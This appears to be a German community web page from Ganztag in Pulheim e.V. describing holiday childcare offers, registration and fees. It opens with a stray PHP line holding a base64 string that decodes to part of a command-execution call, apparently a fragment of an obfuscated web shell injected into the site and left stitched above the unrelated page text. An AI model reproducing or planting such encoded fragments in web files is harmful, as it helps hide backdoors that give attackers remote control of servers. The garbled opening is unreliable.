$bu="Y21kJ10pOw=="; $qu =

Ferienbetreuung

Ganztag in Pulheim e.V. bietet in den Oster- und Herbstferien an 3 Pulheimer Standorten (Pulheim-Zentrum, Brauweiler/Sinthern, Stommeln) Ferienmaßnahmen an. Im Rahmen der Anmeldefristen haben die Kinder der Offenen Ganztagsschulen ein garantiertes Ferienangebot. Je nach Kapazitäten können auch Nicht-OGS Kinder zu den Ferienmaßnahmen angemeldet werden.

In den Sommerferien kooperiert GiP e.V. mit dem Jugendamt und anderen freien Trägern der Jugendhilfe. Im Rahmen der Sommerferienangebote können alle Pulheimer Kinder im Alter zwischen 6 und 12 Jahren maximal 3 Wochen an einem Standort ihrer Wahl angemeldet werden.

Die Eltern melden bei Bedarf ihre Kinder zu den Ferienangeboten an. Die Anmeldeformulare werden vor den jeweiligen Ferien an die Kinder der Offenen Ganztagsschulen verteilt. Für die Ferienangebote wird ein gesonderter Beitrag erhoben. Eltern von Kindern, die nicht in der OGS angemeldet sind, erhalten auf Nachfrage gesonderte Anmeldeformulare in den Schulen, beim Jugendamt der Stadt Pulheim oder in der GiP-Geschäftsstelle. Außerhalb des OGS-Programms wird ein erhöhter Beitrag für die Ferienteilnahme erhoben.

Unsere Ferienangebote werden von erfahrenen Pädagog/innen in Zusammenarbeit mit Jugendlichen und jungen Erwachsenen geplant und durchgeführt. Für Jugendliche (ab 16 Jahren), die sich für eine Mitarbeit in den Ferien interessieren, gibt es weitere Informationen auf der Seite "Jobs" ganz unten.

 


GiP e.V. ist Kooperationspartner der
offenen Ganztagsgrundschulen in Pulheim
  Spenden Sie jetzt.